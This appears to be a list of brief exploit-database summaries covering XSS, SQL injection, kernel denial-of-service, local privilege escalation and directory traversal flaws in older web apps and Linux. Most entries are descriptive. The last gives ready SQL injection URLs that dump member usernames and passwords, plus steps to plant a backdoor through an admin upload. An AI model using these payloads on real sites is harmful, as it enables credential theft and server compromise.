MemHT Portal 4.0.1 is vulnerable to persistent cross-site scripting. An attacker can inject malicious JavaScript code into the user agent field of the login page, which will be executed when an administrator views the statistics page. This can be used to steal cookies and hijack user sessions.
This exploit uses socketpair to create a process in the state 'Running' which is not killable via kill -KILL and eats 100% CPU and all available internal file descriptors in the kernel.
An attacker can inject malicious SQL queries into the vulnerable parameter 'category' of the Jurpopage 0.2.0 software. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
This exploit allows a local user to gain root privileges on a system running Red Hat Enterprise Linux 5. The exploit is based on a vulnerability in the SystemTap package, which allows a local user to execute arbitrary code with root privileges. The exploit works by creating a malicious SystemTap configuration file, which is then loaded by the staprun command. The malicious configuration file contains a printf command that will execute a shell script with root privileges.
This exploit is due to a bad limit on the max size of the stack for 32bit apps on a 64bit OS. Instead of them being limited to 1/4th of a 32bit address space, they're limited to 1/4th of a 64bit address space. This triggers a BUG() as the stack tries to expand around the address space when shifted. The memory usage also explodes within the kernel from a single 128k allocation in userland, which isn't accounted for by any task so it won't be terminated by the OOM killer.
A directory traversal vulnerability exists in VMware 2 Web Server, which allows an attacker to access sensitive files outside of the web root directory. By sending a specially crafted HTTP request, an attacker can traverse the directory structure and access files outside of the web root directory. This can lead to information disclosure and other attacks.
The vulnerability exists due to failure in the 'frog/app/controllers/UserController.php' script to properly verify the source of the HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data. A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the 'frog/app/controllers/PageController.php' script to properly sanitize user-supplied input in the 'page[keywords]' variable. Successful exploitation of this vulnerability could result in a compromise of the application and theft of cookie-based authentication credentials.
The vulnerability exists due to failure in the 'wolf/app/controllers/UserController.php' script to properly verify the source of the HTTP request and to properly sanitize user-supplied input in the 'user[name]' variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
NCH Office Intercom is prone to a remote denial of service attack when parsing a malicious SIP INVITE request. If the Content-Length field has a value of -1 (or a large integer such as 3645363), the server will crash due to a NULL pointer dereference, causing an access violation.
To exploit this vulnerability, comments must be enabled (enabled by default). Enterprise Portal Version: http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23 and http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23. E-commerce Version: http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23. Upload backdoor: Administrator Panel: http://server/admin/ System maintenance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> Browse Right Now -> view properties [the URL is your backdoor].